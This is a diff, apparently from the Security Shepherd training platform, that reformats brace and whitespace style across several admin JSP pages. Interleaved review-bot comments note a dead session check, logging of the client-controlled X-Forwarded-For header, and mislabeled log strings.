+ import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+ errorPage=""%>
<%
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: changeLevelLayout.jsp *************************");
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: changeLevelLayout.jsp *************************");
/**
* This file is part of the Security Shepherd Project.
- *
+ *
* The Security Shepherd project is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
- *
+ *
* The Security Shepherd project is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
- *
+ *
* You should have received a copy of the GNU General Public License
* along with the Security Shepherd project. If not, see .
- *
+ *
* @author Mark Denihan
*/
-
- if (request.getSession() != null) //Session If
- {
- HttpSession ses = request.getSession();
- Getter get = new Getter();
- //Getting CSRF Token from client
- Cookie tokenCookie = null;
- try {
- tokenCookie = Validate.getToken(request.getCookies());
- } catch (Exception htmlE) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(changeLevelLayout.jsp): tokenCookie Error:" + htmlE.toString());
- }
- // validateAdminSession ensures a valid session, and valid administrator credentials
- // Also, if tokenCookie != null, then the page is good to continue loading
- // Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
- Object tokenParmeter = request.getParameter("csrfToken");
- if (Validate.validateAdminSession(ses, tokenCookie, tokenParmeter)) {
- //Logging Username
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
- // Getting Session Variables
- //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
-
- String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
+
+if (request.getSession() != null) //Session If
+{
+ HttpSession ses = request.getSession();
+ Getter get = new Getter();
+ //Getting CSRF Token from client
+ Cookie tokenCookie = null;
+ try
+ {
+ tokenCookie = Validate.getToken(request.getCookies());
+ }
+ catch(Exception htmlE)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(changeLevelLayout.jsp): tokenCookie Error:" + htmlE.toString());
+ }
+ // validateAdminSession ensures a valid session, and valid administrator credentials
+ // Also, if tokenCookie != null, then the page is good to continue loading
+ // Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
+ Object tokenParmeter = request.getParameter("csrfToken");
+ if(Validate.validateAdminSession(ses, tokenCookie, tokenParmeter))
+ {
+ //Logging Username
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ // Getting Session Variables
+ //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
+
+ String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
%>
-
- Current Mode:
-
<%= ModulePlan.currentMode() %>
-
-
-
-
You can change the layout in which modules are presented to
- players. Use the following functions to change the current Shepherd
- Mode.
-
-
-
-
-
- style="display: none;" <% } %>>
-
Enable CTF Mode
-
When Shepherd has been deployed in the CTF mode, a user can
- only access one uncompleted module at a time. The first module
- presented to the user is the easiest in Security Shepherd, which has
- not been marked as closed by the administrator. The levels increase
- slowly in difficulty and jump from one topic to another. This layout
- is the recommended setting when using Security Shepherd for a
- competitive training scenario.
You can change the layout in which modules are presented to
+ players. Use the following functions to change the current Shepherd
+ Mode.
+
+
-
-
- style="display: none;" <% } %>>
-
Enable Open Floor Mode
-
When Shepherd has been deployed in the Open Floor mode, a user
- can access any level that is marked as open by the admin. Modules
- are sorted into their Security Risk Categories, and the lessons are
- presented first. This layout is ideal for users wishing to explore
- security risks.
When Shepherd has been deployed in the CTF mode, a user can
+ only access one uncompleted module at a time. The first module
+ presented to the user is the easiest in Security Shepherd, which has
+ not been marked as closed by the administrator. The levels increase
+ slowly in difficulty and jump from one topic to another. This layout
+ is the recommended setting when using Security Shepherd for a
+ competitive training scenario.
When Shepherd has been deployed in the Tournament Mode, a user
- can access any level that is marked as open by the admin. Modules
- are sorted into difficulty bands, from least to most difficult. This
- layout is ideal when Shepherd is being utilised as an open
- application security competition.
When Shepherd has been deployed in the Tournament Mode, a user
+ can access any level that is marked as open by the admin. Modules
+ are sorted into difficulty bands, from least to most difficult. This
+ layout is ideal when Shepherd is being utilised as an open
+ application security competition.
-<%
- } //Valid Session If
- else {
- response.sendRedirect("../../loggedOutSheep.html");
- }
- } //Session If
- else {
- response.sendRedirect("../../loggedOutSheep.html");
- }
+<%
+ } //Valid Session If
+ else
+ {
+ response.sendRedirect("../../loggedOutSheep.html");
+ }
+} //Session If
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
%>
diff --git a/src/main/webapp/admin/moduleManagement/classProgress.jsp b/src/main/webapp/admin/moduleManagement/classProgress.jsp
index 33724b937..bd332af87 100644
--- a/src/main/webapp/admin/moduleManagement/classProgress.jsp
+++ b/src/main/webapp/admin/moduleManagement/classProgress.jsp
@@ -1,145 +1,164 @@
<%@ page contentType="text/html; charset=iso-8859-1" language="java"
- import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
- errorPage="" %>
+ import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+ errorPage=""%>
<%
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: classProgress.jsp *************************");
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: classProgress.jsp *************************");
/**
* This file is part of the Security Shepherd Project.
- *
+ *
* The Security Shepherd project is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
- *
+ *
* The Security Shepherd project is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
- *
+ *
* You should have received a copy of the GNU General Public License
* along with the Security Shepherd project. If not, see .
- *
+ *
* @author Mark Denihan
*/
-
- if (request.getSession() != null) {
- HttpSession ses = request.getSession();
- Getter get = new Getter();
+
+if (request.getSession() != null)
+{
+HttpSession ses = request.getSession();
+Getter get = new Getter();
//Getting CSRF Token from client
- Cookie tokenCookie = null;
- try {
- tokenCookie = Validate.getToken(request.getCookies());
- } catch (Exception htmlE) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(classProgress.jsp): tokenCookie Error:" + htmlE.toString());
- }
+Cookie tokenCookie = null;
+try
+{
+ tokenCookie = Validate.getToken(request.getCookies());
+}
+catch(Exception htmlE)
+{
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(classProgress.jsp): tokenCookie Error:" + htmlE.toString());
+}
// validateAdminSession ensures a valid session, and valid administrator credentials
// Also, if tokenCookie != null, then the page is good to continue loading
// Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
- Object tokenParmeter = request.getParameter("csrfToken");
- if (Validate.validateAdminSession(ses, tokenCookie, tokenParmeter)) {
- //Logging Username
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+Object tokenParmeter = request.getParameter("csrfToken");
+if(Validate.validateAdminSession(ses, tokenCookie, tokenParmeter))
+{
+ //Logging Username
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
// Getting Session Variables
//The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
- String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
- String ApplicationRoot = getServletContext().getRealPath("");
- ResultSet classList = Getter.getClassInfo(ApplicationRoot);
- boolean showClasses = true;
- try {
- showClasses = classList.next();
- } catch (SQLException e) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Could not open classList: " + e.toString());
- showClasses = false;
- }
+String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
+String ApplicationRoot = getServletContext().getRealPath("");
+ResultSet classList = Getter.getClassInfo(ApplicationRoot);
+boolean showClasses = true;
+try
+{
+ showClasses = classList.next();
+}
+catch(SQLException e)
+{
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Could not open classList: " + e.toString());
+ showClasses = false;
+}
%>
-
Get Progress
-
-
-
-
+
Get Progress
+
+
+
+
<%
- } else {
- response.sendRedirect("../../loggedOutSheep.html");
- }
- } else {
- response.sendRedirect("../../loggedOutSheep.html");
- }
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
%>
\ No newline at end of file
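Review bot: The outer guard `if (request.getSession() != null)` near the top of the scriptlet can never be false, because the no-argument `HttpServletRequest.getSession()` creates a session when none exists; the final `else` redirect is therefore dead code. `request.getSession(false)` is the form that can return null, although with the page directive's default `session="true"` the container will already have created a session before the scriptlet runs. Either drop the outer check or pair `session="false"` with `HttpSession ses = request.getSession(false);` and `if (ses != null)`. Access control still rests on `Validate.validateAdminSession`, whose body is not in this diff, so this concerns a misleading check and needless session creation rather than a bypass. The same pattern is in the feedback.jsp, moduleBlock.jsp, openCloseByCategory.jsp, setStatus.jsp, addPlayers.jsp and assignPlayers.jsp hunks.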
diff --git a/src/main/webapp/admin/moduleManagement/feedback.jsp b/src/main/webapp/admin/moduleManagement/feedback.jsp
index b2e4dc603..9a70bf70a 100644
--- a/src/main/webapp/admin/moduleManagement/feedback.jsp
+++ b/src/main/webapp/admin/moduleManagement/feedback.jsp
@@ -1,120 +1,132 @@
<%@ page contentType="text/html; charset=iso-8859-1" language="java"
- import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
- errorPage="" %>
+ import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+ errorPage=""%>
<%
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: feedback.jsp *************************");
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: feedback.jsp *************************");
/**
* This file is part of the Security Shepherd Project.
- *
+ *
* The Security Shepherd project is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
- *
+ *
* The Security Shepherd project is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
- *
+ *
* You should have received a copy of the GNU General Public License
* along with the Security Shepherd project. If not, see .
- *
+ *
* @author Mark Denihan
*/
-
- if (request.getSession() != null) {
- HttpSession ses = request.getSession();
- Getter get = new Getter();
+
+if (request.getSession() != null)
+{
+HttpSession ses = request.getSession();
+Getter get = new Getter();
//Getting CSRF Token from client
- Cookie tokenCookie = null;
- try {
- tokenCookie = Validate.getToken(request.getCookies());
- } catch (Exception htmlE) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(feedback.jsp): tokenCookie Error:" + htmlE.toString());
- }
+Cookie tokenCookie = null;
+try
+{
+ tokenCookie = Validate.getToken(request.getCookies());
+}
+catch(Exception htmlE)
+{
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(feedback.jsp): tokenCookie Error:" + htmlE.toString());
+}
// validateAdminSession ensures a valid session, and valid administrator credentials
// Also, if tokenCookie != null, then the page is good to continue loading
// Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
- Object tokenParmeter = request.getParameter("csrfToken");
- if (Validate.validateAdminSession(ses, tokenCookie, tokenParmeter)) {
- //Logging Username
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+Object tokenParmeter = request.getParameter("csrfToken");
+if(Validate.validateAdminSession(ses, tokenCookie, tokenParmeter))
+{
+ //Logging Username
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
// Getting Session Variables
//The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
- String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
- String ApplicationRoot = getServletContext().getRealPath("");
+String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
+String ApplicationRoot = getServletContext().getRealPath("");
%>
-
Get Module Feedback
-
-
-
-
+
Get Module Feedback
+
+
+
+
<%
- } else {
- response.sendRedirect("../../loggedOutSheep.html");
- }
- } else {
- response.sendRedirect("../../loggedOutSheep.html");
- }
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
%>
\ No newline at end of file
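Review bot: `request.getHeader("X-Forwarded-For")` is passed to `ShepherdLogManager.logEvent` on every log call in this scriptlet, and that header is whatever the client sent unless a trusted proxy overwrites it. If `logEvent` (not shown in this diff) writes the value verbatim, a request can place line breaks or a spoofed address into the admin access log, so it is worth confirming that the helper neutralises CR/LF and records the header as untrusted next to `getRemoteAddr()`. A comment at the first call would make the assumption explicit, e.g. `// X-Forwarded-For is client-controlled; logEvent must strip CR/LF`. The same calls appear in the other admin JSP hunks of this commit.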
diff --git a/src/main/webapp/admin/moduleManagement/moduleBlock.jsp b/src/main/webapp/admin/moduleManagement/moduleBlock.jsp
index 3548bd0bc..e8c73d4bc 100644
--- a/src/main/webapp/admin/moduleManagement/moduleBlock.jsp
+++ b/src/main/webapp/admin/moduleManagement/moduleBlock.jsp
@@ -1,175 +1,189 @@
<%@ page contentType="text/html; charset=iso-8859-1" language="java"
- import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
- errorPage="" %>
+ import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+ errorPage=""%>
<%
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: stopHere.jsp *************************");
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: stopHere.jsp *************************");
/**
* This file is part of the Security Shepherd Project.
- *
+ *
* The Security Shepherd project is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
- *
+ *
* The Security Shepherd project is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
- *
+ *
* You should have received a copy of the GNU General Public License
* along with the Security Shepherd project. If not, see .
- *
+ *
* @author Mark Denihan
*/
-
- if (request.getSession() != null) {
- HttpSession ses = request.getSession();
- Getter get = new Getter();
+
+if (request.getSession() != null)
+{
+HttpSession ses = request.getSession();
+Getter get = new Getter();
//Getting CSRF Token from client
- Cookie tokenCookie = null;
- try {
- tokenCookie = Validate.getToken(request.getCookies());
- } catch (Exception htmlE) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(stopHere.jsp): tokenCookie Error:" + htmlE.toString());
- }
+Cookie tokenCookie = null;
+try
+{
+ tokenCookie = Validate.getToken(request.getCookies());
+}
+catch(Exception htmlE)
+{
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(stopHere.jsp): tokenCookie Error:" + htmlE.toString());
+}
// validateAdminSession ensures a valid session, and valid administrator credentials
// Also, if tokenCookie != null, then the page is good to continue loading
// Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
- Object tokenParmeter = request.getParameter("csrfToken");
- if (Validate.validateAdminSession(ses, tokenCookie, tokenParmeter)) {
- //Logging Username
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+Object tokenParmeter = request.getParameter("csrfToken");
+if(Validate.validateAdminSession(ses, tokenCookie, tokenParmeter))
+{
+ //Logging Username
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
// Getting Session Variables
//The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
- String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
- String ApplicationRoot = getServletContext().getRealPath("");
+String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
+String ApplicationRoot = getServletContext().getRealPath("");
%>
<%
- } else {
- response.sendRedirect("../../loggedOutSheep.html");
- }
- } else {
- response.sendRedirect("../../loggedOutSheep.html");
- }
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
%>
\ No newline at end of file
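Review bot: The log labels in this file still read `stopHere.jsp` (in `"DEBUG: stopHere.jsp *************************"` and `"DEBUG(stopHere.jsp): tokenCookie Error:"`) although the file is moduleBlock.jsp, so access and token-error entries for this admin page are attributed to the wrong page when the logs are reviewed. Since the commit rewrites both lines anyway, the strings could become `"DEBUG: moduleBlock.jsp *************************"` and `"DEBUG(moduleBlock.jsp): tokenCookie Error:"`. Whether any log consumer matches on the old label is not visible here and should be checked before renaming.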
diff --git a/src/main/webapp/admin/moduleManagement/openCloseByCategory.jsp b/src/main/webapp/admin/moduleManagement/openCloseByCategory.jsp
index f78d37a21..bce0448b7 100644
--- a/src/main/webapp/admin/moduleManagement/openCloseByCategory.jsp
+++ b/src/main/webapp/admin/moduleManagement/openCloseByCategory.jsp
@@ -1,168 +1,183 @@
<%@ page contentType="text/html; charset=iso-8859-1" language="java"
- import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
- errorPage="" %>
+ import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+ errorPage=""%>
<%
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: openCloseByCategory.jsp *************************");
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: openCloseByCategory.jsp *************************");
/**
* This file is part of the Security Shepherd Project.
- *
+ *
* The Security Shepherd project is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
- *
+ *
* The Security Shepherd project is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
- *
+ *
* You should have received a copy of the GNU General Public License
* along with the Security Shepherd project. If not, see .
- *
+ *
* @author Mark Denihan
*/
-
- if (request.getSession() != null) {
- HttpSession ses = request.getSession();
- Getter get = new Getter();
+
+if (request.getSession() != null)
+{
+HttpSession ses = request.getSession();
+Getter get = new Getter();
//Getting CSRF Token from client
- Cookie tokenCookie = null;
- try {
- tokenCookie = Validate.getToken(request.getCookies());
- } catch (Exception htmlE) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(openCloseByCategory.jsp): tokenCookie Error:" + htmlE.toString());
- }
+Cookie tokenCookie = null;
+try
+{
+ tokenCookie = Validate.getToken(request.getCookies());
+}
+catch(Exception htmlE)
+{
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(openCloseByCategory.jsp): tokenCookie Error:" + htmlE.toString());
+}
// validateAdminSession ensures a valid session, and valid administrator credentials
// Also, if tokenCookie != null, then the page is good to continue loading
// Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
- Object tokenParmeter = request.getParameter("csrfToken");
- if (Validate.validateAdminSession(ses, tokenCookie, tokenParmeter)) {
- //Logging Username
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+Object tokenParmeter = request.getParameter("csrfToken");
+if(Validate.validateAdminSession(ses, tokenCookie, tokenParmeter))
+{
+ //Logging Username
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
// Getting Session Variables
//The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
- String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
- String ApplicationRoot = getServletContext().getRealPath("");
+String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
+String ApplicationRoot = getServletContext().getRealPath("");
%>
<%
- } else {
- response.sendRedirect("../../loggedOutSheep.html");
- }
- } else {
- response.sendRedirect("../../loggedOutSheep.html");
- }
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
%>
\ No newline at end of file
diff --git a/src/main/webapp/admin/moduleManagement/setStatus.jsp b/src/main/webapp/admin/moduleManagement/setStatus.jsp
index 9d94b8e67..f0600c4ac 100644
--- a/src/main/webapp/admin/moduleManagement/setStatus.jsp
+++ b/src/main/webapp/admin/moduleManagement/setStatus.jsp
@@ -1,124 +1,136 @@
<%@ page contentType="text/html; charset=iso-8859-1" language="java"
- import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
- errorPage="" %>
+ import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+ errorPage=""%>
<%
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: setStatus.jsp *************************");
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: setStatus.jsp *************************");
/**
* This file is part of the Security Shepherd Project.
- *
+ *
* The Security Shepherd project is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
- *
+ *
* The Security Shepherd project is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
- *
+ *
* You should have received a copy of the GNU General Public License
* along with the Security Shepherd project. If not, see .
- *
+ *
* @author Mark Denihan
*/
-
- if (request.getSession() != null) {
- HttpSession ses = request.getSession();
- Getter get = new Getter();
+
+if (request.getSession() != null)
+{
+HttpSession ses = request.getSession();
+Getter get = new Getter();
//Getting CSRF Token from client
- Cookie tokenCookie = null;
- try {
- tokenCookie = Validate.getToken(request.getCookies());
- } catch (Exception htmlE) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(setStatus.jsp): tokenCookie Error:" + htmlE.toString());
- }
+Cookie tokenCookie = null;
+try
+{
+ tokenCookie = Validate.getToken(request.getCookies());
+}
+catch(Exception htmlE)
+{
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(setStatus.jsp): tokenCookie Error:" + htmlE.toString());
+}
// validateAdminSession ensures a valid session, and valid administrator credentials
// Also, if tokenCookie != null, then the page is good to continue loading
// Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
- Object tokenParmeter = request.getParameter("csrfToken");
- if (Validate.validateAdminSession(ses, tokenCookie, tokenParmeter)) {
- //Logging Username
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+Object tokenParmeter = request.getParameter("csrfToken");
+if(Validate.validateAdminSession(ses, tokenCookie, tokenParmeter))
+{
+ //Logging Username
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
// Getting Session Variables
//The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
- String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
- String ApplicationRoot = getServletContext().getRealPath("");
+String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
+String ApplicationRoot = getServletContext().getRealPath("");
%>
-
Open and Close Levels
-
-
-
+
Open and Close Levels
+
+
+
-
-
+
+
Loading...
-
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+
+<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
<% } %>
<%
- } else {
- response.sendRedirect("../../loggedOutSheep.html");
- }
- } else {
- response.sendRedirect("../../loggedOutSheep.html");
- }
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
%>
\ No newline at end of file
diff --git a/src/main/webapp/admin/userManagement/addPlayers.jsp b/src/main/webapp/admin/userManagement/addPlayers.jsp
index 617d548bd..d4036144f 100644
--- a/src/main/webapp/admin/userManagement/addPlayers.jsp
+++ b/src/main/webapp/admin/userManagement/addPlayers.jsp
@@ -1,217 +1,245 @@
<%@ page contentType="text/html; charset=iso-8859-1" language="java"
- import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
- errorPage="" %>
+ import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+ errorPage=""%>
<%
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: addPlayers.jsp *************************");
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: addPlayers.jsp *************************");
/**
* This file is part of the Security Shepherd Project.
- *
+ *
* The Security Shepherd project is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
- *
+ *
* The Security Shepherd project is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
- *
+ *
* You should have received a copy of the GNU General Public License
* along with the Security Shepherd project. If not, see .
- *
+ *
* @author Mark Denihan
*/
-
- if (request.getSession() != null) {
- HttpSession ses = request.getSession();
- Getter get = new Getter();
+
+if (request.getSession() != null)
+{
+HttpSession ses = request.getSession();
+Getter get = new Getter();
//Getting CSRF Token from client
- Cookie tokenCookie = null;
- try {
- tokenCookie = Validate.getToken(request.getCookies());
- } catch (Exception htmlE) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(addPlayers.jsp): tokenCookie Error:" + htmlE.toString());
- }
+Cookie tokenCookie = null;
+try
+{
+ tokenCookie = Validate.getToken(request.getCookies());
+}
+catch(Exception htmlE)
+{
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(addPlayers.jsp): tokenCookie Error:" + htmlE.toString());
+}
// validateAdminSession ensures a valid session, and valid administrator credentials
// Also, if tokenCookie != null, then the page is good to continue loading
// Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
- Object tokenParmeter = request.getParameter("csrfToken");
- if (Validate.validateAdminSession(ses, tokenCookie, tokenParmeter)) {
- //Logging Username
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+Object tokenParmeter = request.getParameter("csrfToken");
+if(Validate.validateAdminSession(ses, tokenCookie, tokenParmeter))
+{
+ //Logging Username
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
// Getting Session Variables
//The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
- String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
- String userName = Encode.forHtml(ses.getAttribute("userName").toString());
- String userRole = Encode.forHtml(ses.getAttribute("userRole").toString());
- String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
- String ApplicationRoot = getServletContext().getRealPath("");
- boolean showClasses = false;
+String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
+String userName = Encode.forHtml(ses.getAttribute("userName").toString());
+String userRole = Encode.forHtml(ses.getAttribute("userRole").toString());
